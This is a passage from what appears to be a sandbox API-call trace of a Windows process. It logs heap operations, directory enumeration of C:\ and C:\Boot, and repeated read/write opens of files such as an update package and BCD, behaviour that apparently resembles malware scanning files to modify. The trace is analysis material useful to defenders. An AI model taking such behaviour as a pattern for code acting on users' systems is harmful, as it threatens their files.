lpMultiByteStr="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu", lpUsedDefaultChar=0x0) returned 56 [0068.789] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0068.789] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.789] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.789] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0068.789] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0068.789] AreFileApisANSI () returned 1 [0068.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0068.789] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0068.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x75eb8, cchWideChar=56 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu") returned 56 [0068.789] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x86.msu"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0068.789] GetFileType (hFile=0x410) returned 0x1 [0068.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0068.790] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0068.790] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0068.790] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0068.790] CloseHandle (hObject=0x410) returned 1 [0068.790] AreFileApisANSI () returned 1 [0068.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0068.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0068.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x75dc8, cchWideChar=56 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu") returned 56 [0068.790] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x86.msu"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0068.790] GetFileType (hFile=0x410) returned 0x1 [0068.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0068.791] CloseHandle (hObject=0x410) returned 1 [0068.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0068.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0068.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0068.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0068.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0068.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0068.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0068.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0068.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d2c0 [0068.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0068.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0068.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0068.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d2c0 | out: hHeap=0x20000) returned 1 [0068.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0068.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0068.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0068.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0068.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d2c0 [0068.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0068.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0068.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0068.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d2c0 | out: hHeap=0x20000) returned 1 [0068.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0068.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0068.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0068.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0068.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0068.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0068.791] AreFileApisANSI () returned 1 [0068.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0068.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0068.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x75b70, cchWideChar=56 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu") returned 56 [0068.792] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x86.msu"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0ac5d00, ftCreationTime.dwHighDateTime=0x1cac6ce, ftLastAccessTime.dwLowDateTime=0xd0ac5d00, ftLastAccessTime.dwHighDateTime=0x1cac6ce, ftLastWriteTime.dwLowDateTime=0xd0ac5d00, ftLastWriteTime.dwHighDateTime=0x1cac6ce, nFileSizeHigh=0x0, nFileSizeLow=0x20acf9)) returned 1 [0068.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0068.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0068.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0068.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0068.792] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.792] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.792] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x6e, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x69bb8, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x6e, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="48", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓곹 ⺊Ābc먤聤̓㑍Ā̓蹐\x07̓뻌聤곹 곹 ows6.1-KB958488-v6001-x86.msu")) returned 0 [0068.792] FindClose (in: hFindFile=0x78e50 | out: hFindFile=0x78e50) returned 1 [0068.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0068.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0068.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0068.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0068.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0068.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0068.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0068.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cce0 | out: hHeap=0x20000) returned 1 [0068.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f5c8 | out: hHeap=0x20000) returned 1 [0068.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46b38 | out: hHeap=0x20000) returned 1 [0068.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cce0 [0068.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f5c8 [0068.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cce0 | out: hHeap=0x20000) returned 1 [0068.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f5c8 | out: hHeap=0x20000) returned 1 [0068.792] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.792] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.792] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.792] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.792] AreFileApisANSI () returned 1 [0068.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot", lpUsedDefaultChar=0x0) returned 8 [0068.793] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.793] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cce0 [0068.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0068.793] AreFileApisANSI () returned 1 [0068.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d660 [0068.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x7d660, cchWideChar=8 | out: lpWideCharStr="C:\\Boot") returned 8 [0068.793] CreateFileW (lpFileName="C:\\Boot" (normalized: "c:\\boot"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.793] GetLastError () returned 0x5 [0068.793] GetLastError () returned 0x5 [0068.793] SetLastError (dwErrCode=0x5) [0068.793] GetLastError () returned 0x5 [0068.793] SetLastError (dwErrCode=0x5) [0068.793] GetLastError () returned 0x5 [0068.793] SetLastError (dwErrCode=0x5) [0068.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d660 | out: hHeap=0x20000) returned 1 [0068.793] AreFileApisANSI () returned 1 [0068.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d750 [0068.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x7d750, cchWideChar=8 | out: lpWideCharStr="C:\\Boot") returned 8 [0068.794] CreateFileW (lpFileName="C:\\Boot" (normalized: "c:\\boot"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.794] GetLastError () returned 0x5 [0068.794] GetLastError () returned 0x5 [0068.794] SetLastError (dwErrCode=0x5) [0068.794] GetLastError () returned 0x5 [0068.794] SetLastError (dwErrCode=0x5) [0068.794] GetLastError () returned 0x5 [0068.794] SetLastError (dwErrCode=0x5) [0068.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d750 | out: hHeap=0x20000) returned 1 [0068.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0068.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cce0 | out: hHeap=0x20000) returned 1 [0068.794] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.794] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.794] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.794] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.794] FindNextFileW (in: hFindFile=0x78dd0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xe47a48a8, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0xef6fa258, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xfb90936b, ftLastWriteTime.dwHighDateTime=0x1d2fa06, nFileSizeHigh=0x0, nFileSizeLow=0x607da, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0068.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cce0 [0068.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f5c8 [0068.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0068.794] FindFirstFileExW (in: lpFileName="C:\\Boot\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78e50 [0068.795] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9d311c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef9d311c, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.958] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc4c800b6, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xd36fe848, ftLastAccessTime.dwHighDateTime=0x1d5d815, ftLastWriteTime.dwLowDateTime=0xd36fe848, ftLastWriteTime.dwHighDateTime=0x1d5d815, nFileSizeHigh=0x0, nFileSizeLow=0xb000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0068.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0068.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46908 [0068.981] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0068.981] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0068.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0068.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0068.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0068.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0068.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0068.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0068.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0068.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0068.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0068.985] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.985] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.985] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.985] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0069.007] AreFileApisANSI () returned 1 [0069.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\BCD", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\BCD", lpUsedDefaultChar=0x0) returned 12 [0069.007] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.007] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0069.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0069.007] AreFileApisANSI () returned 1 [0069.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0069.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x18) returned 0x6f2c8 [0069.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x6f2c8, cchWideChar=12 | out: lpWideCharStr="C:\\Boot\\BCD") returned 12 [0069.007] CreateFileW (lpFileName="C:\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.007] GetLastError () returned 0x20 [0069.007] GetLastError () returned 0x20 [0069.007] SetLastError (dwErrCode=0x20) [0069.008] GetLastError () returned 0x20 [0069.008] SetLastError (dwErrCode=0x20) [0069.008] GetLastError () returned 0x20 [0069.008] SetLastError (dwErrCode=0x20) [0069.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0069.008] AreFileApisANSI () returned 1 [0069.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0069.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x18) returned 0x6f028 [0069.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x6f028, cchWideChar=12 | out: lpWideCharStr="C:\\Boot\\BCD") returned 12 [0069.008] CreateFileW (lpFileName="C:\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.008] GetLastError () returned 0x20 [0069.008] GetLastError () returned 0x20 [0069.008] SetLastError (dwErrCode=0x20) [0069.008] GetLastError () returned 0x20 [0069.008] SetLastError (dwErrCode=0x20) [0069.008] GetLastError () returned 0x20 [0069.008] SetLastError (dwErrCode=0x20) [0069.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0069.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0069.009] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.009] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.009] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc4c800b6, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4c800b6, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4c800b6, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0069.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0069.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0069.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0069.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0069.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0069.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0069.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0069.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.009] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.009] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.009] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.009] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0069.009] AreFileApisANSI () returned 1 [0069.009] WideCharToMultiByte (in: CodePage=0x0, 